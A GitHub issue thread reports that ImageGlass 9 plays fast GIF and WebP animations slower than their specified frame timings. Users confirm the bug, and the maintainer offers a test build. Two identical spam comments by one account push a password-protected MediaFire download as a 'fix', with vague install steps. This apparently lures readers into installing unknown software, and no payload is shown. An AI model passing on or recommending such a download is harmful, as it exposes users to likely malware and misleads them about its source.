### ISSUE TITLE
gif playback is slower than it should be

### ISSUE THREAD

**Issue by Gawidev** [d2phap/ImageGlass#1998]
### System information
- Windows OS version: Windows 11 23H2
- ImageGlass version: 9.1.8.723
- ImageGlass release: Classic, portable

### To Reproduce
1. Open any gif file that has a fast playback speed (around <100ms per frame)

### Actual behavior
- Playback happens at what seems like a constant frame timing, but is slower than it should be

### Expected behavior
The gif should play at the speeds specified in the file

### Screenshots / Video / Sample image file
https://github.com/user-attachments/assets/474eaf69-36f6-4b76-b878-ab259a4fd596

This video displays ImageGlass side by side with Aseprite both playing the same gif file (with 20ms/frame timing). I start the playback in aseprite slightly too early, but regardless it takes very few loops for the playback in aseprite to overtake the one in ImageGlass entirely.
Here is the file in question ![3000000](https://github.com/user-attachments/assets/fcd5441a-62dc-4210-ad1e-cc55a35cb93f)

### Additional context
This effect is very hard to notice with gif files that have longer frames.
Playback also seems to be even slower than usual when the file has a higher resolution.

---

*Edit: I've recently found that this issue also applies to .webp animated pictures. Haven't checked but this may potentially also apply to other animated image formats.*

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Warrior-Elite** [comment]
Agreed. ImageGlass 8 and below worked perfectly fine. Almost all GIFs in IG 9.0+ play at around 60-80% speed.

**Comment by AmeJunn** [comment]
Yeah I just tested and can confirm that gifs are playing slower

**Comment by novaexe** [comment]
yep same here

**Comment by KonoVitoDa** [comment]
Same here! Any fix?

**Comment by PresterJohn1601** [comment]
Same issue here, gifs are very slow

**Comment by TheConfusedlol** [comment]
Can confirm.

**Comment by ACT-KK** [comment]
Incorrect playback with 7-bit depth formats.

![Image](https://github.com/user-attachments/assets/a4692cfc-9f28-4eb0-8a57-5c89618a0861)
![Image](https://github.com/user-attachments/assets/b0db3eac-f741-4fd3-a422-f78f089d544b)

**Comment by d2phap** [comment]
Could you help me test this build 921 if the issue is fixed?
https://drive.google.com/file/d/1JvI237VAbbnjw12Dt94SD4AXeNT9cAjf/view?usp=sharing
